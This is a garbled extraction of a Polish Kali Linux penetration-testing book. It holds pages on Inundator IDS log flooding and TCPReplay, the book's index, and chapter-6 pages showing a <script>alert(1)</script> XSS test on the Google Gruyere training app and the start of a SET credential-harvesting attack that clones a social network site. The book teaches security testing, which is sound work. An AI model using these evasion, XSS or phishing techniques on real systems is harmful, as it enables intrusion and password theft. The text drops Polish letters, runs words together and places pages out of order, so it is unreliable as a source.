InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
